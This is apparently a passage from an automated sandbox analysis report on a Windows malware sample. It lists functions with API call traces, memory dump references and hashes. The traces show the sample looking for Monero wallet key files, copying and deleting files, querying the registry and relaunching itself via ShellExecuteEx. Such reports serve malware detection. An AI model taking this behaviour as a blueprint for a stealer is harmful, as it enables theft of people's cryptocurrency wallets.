                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FA12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FA12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FA12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00FA12FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 7721b8b26d9e37d95b3ac992cc05401fa0b23572285f24ea8f6970b51ecb128a
                                    • Instruction ID: ee6cb74f5c84941961e0bbe187f6771d87b4428cee682031de767e9bae808047
                                    • Opcode Fuzzy Hash: 7721b8b26d9e37d95b3ac992cc05401fa0b23572285f24ea8f6970b51ecb128a
                                    • Instruction Fuzzy Hash: 9701E1B9A40208BBDB14DFE4E849FAEB7F8EF48701F108169FA159B284D6759A418F50
                                    Function 00FBC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 0608fbf24f6dcf1b4251c2956662a0eef401c89d9d2208ce63357605f10b1f1d
                                    • Instruction ID: 37a0d908dd8a66a521b059cef00ba6acca67a5c6273a9456adfe96602f7ad92f
                                    • Opcode Fuzzy Hash: 0608fbf24f6dcf1b4251c2956662a0eef401c89d9d2208ce63357605f10b1f1d
                                    • Instruction Fuzzy Hash: 0E41F67150075C9EEB218B25CC85FFB7BFC9B45704F1444E8E98A87182E2759A44EFA0
                                    Function 00FB6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FB6663
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FB6726
                                    • ExitProcess.KERNEL32 ref: 00FB6755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 2fc4d234e9fb3f47971cd7005b212afe49ae28d85078f39173e1ca3abe4ab9e7
                                    • Instruction ID: 477dc97228ac85054c19e1314198191ae5ea9db2d53fd0befe5080800726962d
                                    • Opcode Fuzzy Hash: 2fc4d234e9fb3f47971cd7005b212afe49ae28d85078f39173e1ca3abe4ab9e7
                                    • Instruction Fuzzy Hash: BF312BB1C01218AADB18EB91DC92FDEB77CAF44300F404199F21A67181DF786B89DF65
                                    Function 00FB87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FC0E28,00000000,?), ref: 00FB882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB8836
                                    • wsprintfA.USER32 ref: 00FB8850
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 3c89994d11d78649506e62f3006d0cd8f681bded83a205a7c12d9a35cb2663af
                                    • Instruction ID: 5af89e254f381e5fb544985a83520fbd797dd77e47122f0a15b5cd9947150f55
                                    • Opcode Fuzzy Hash: 3c89994d11d78649506e62f3006d0cd8f681bded83a205a7c12d9a35cb2663af
                                    • Instruction Fuzzy Hash: 7C212EB1A40208AFDB18DFD4ED45FAEBBF8FB48701F104129F615AB284C77999418BA1
                                    Function 00FB8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FB951E,00000000), ref: 00FB8D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB8D62
                                    • wsprintfW.USER32 ref: 00FB8D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: ca8d70c7f6d1aca70a279ef5cd25179fcb6b07ae9887ec0a45dcfb37beb6b539
                                    • Instruction ID: 843712a92f3771ad4efc5c895f903f42fd175b4236d0e589226172303d5693a4
                                    • Opcode Fuzzy Hash: ca8d70c7f6d1aca70a279ef5cd25179fcb6b07ae9887ec0a45dcfb37beb6b539
                                    • Instruction Fuzzy Hash: B3E08670A40208FBC718DBD4E90AE597BF8EF04702F004064FD098B280D9719E409B51
                                    Function 00FAA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FAA2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00FAA3FF
                                    • lstrlen.KERNEL32(00000000), ref: 00FAA6BC
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FAA743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 35a573e2f3465c87e0c0ec0a485a503b8025218d58a5020d5ecfe00567ef66d0
                                    • Instruction ID: e82dacf96a732a5e2dca673059bc7573dedb4f759c0857353a809d04989822f3
                                    • Opcode Fuzzy Hash: 35a573e2f3465c87e0c0ec0a485a503b8025218d58a5020d5ecfe00567ef66d0
                                    • Instruction Fuzzy Hash: 69E1F372810108AADB14FBA5DC92EEE733CAF54300F508169F51776491EF386A59EF72
                                    Function 00FAD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FAD481
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD698
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FAD72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: ed8558521e283a3d5ba31ed2ee887fb075a3420a61ae9505b07d3361e7f0e5a4
                                    • Instruction ID: 97a5095f78364fe5a44cb746363d28a72755fa6ebdff8f0e5a14d6a14ce74f51
                                    • Opcode Fuzzy Hash: ed8558521e283a3d5ba31ed2ee887fb075a3420a61ae9505b07d3361e7f0e5a4
                                    • Instruction Fuzzy Hash: BC911471910108ABDB18FBA1DDA2EEE733CAF54300F504168F51776491EF38AA59EF62
                                    Function 00FAD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB8B60: GetSystemTime.KERNEL32(00FC0E1A,008CA8B0,00FC05AE,?,?,00FA13F9,?,0000001A,00FC0E1A,00000000,?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FB8B86
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FAD801
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD99F
                                    • lstrlen.KERNEL32(00000000), ref: 00FAD9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FADA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 299b5e5ea428c9d010325d4a9e9b81f3168cdafe166e509f187b2823393ca262
                                    • Instruction ID: 78af012414d8f5abf55aee27f16090a95200bec92e1f3b54b17e0c8dd5ea4e16
                                    • Opcode Fuzzy Hash: 299b5e5ea428c9d010325d4a9e9b81f3168cdafe166e509f187b2823393ca262
                                    • Instruction Fuzzy Hash: EB811471910108AADB18FBE1DDA2DEE737CAF54300F504128F417B6491EF38AA59EF62
                                    Function 00FAF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FA99EC
                                      • Part of subcall function 00FA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FA9A11
                                      • Part of subcall function 00FA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FA9A31
                                      • Part of subcall function 00FA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FA148F,00000000), ref: 00FA9A5A
                                      • Part of subcall function 00FA99C0: LocalFree.KERNEL32(00FA148F), ref: 00FA9A90
                                      • Part of subcall function 00FA99C0: CloseHandle.KERNEL32(000000FF), ref: 00FA9A9A
                                      • Part of subcall function 00FB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FB8E52
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00FC1580,00FC0D92), ref: 00FAF54C
                                    • lstrlen.KERNEL32(00000000), ref: 00FAF56B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
